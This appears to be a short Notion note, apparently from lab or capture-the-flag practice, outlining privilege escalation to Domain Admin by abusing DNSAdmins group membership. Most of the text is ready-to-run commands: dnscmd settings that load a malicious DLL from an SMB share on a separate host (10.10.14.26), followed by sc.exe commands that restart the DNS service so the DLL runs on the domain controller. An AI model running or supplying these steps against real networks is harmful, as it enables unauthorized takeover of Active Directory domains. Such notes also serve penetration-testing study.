Escalating Privileges with DNSAdmins Group | Notion

Malicious DLL Injection on a Active Directory Domain Controller

$_Attack_Outline

🎯 Goal

Escalating to domain Admin

🛠️ Prerequisites

A user account; member of DNSAdmins Group

🔥 How

DLL Injection of DNS Plugin

dnscmd commands

dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.14.26\new1\DNSPriv.dll

dnscmd megabank.local /config /serverlevelplugindll \\10.10.14.26\new1\DNSPriv.dll

* You can either use localhost IP address or FQDN

Start and Stop the DNS Service

sc.exe stop dns

sc.exe start dns

SMB Sharing with Impacket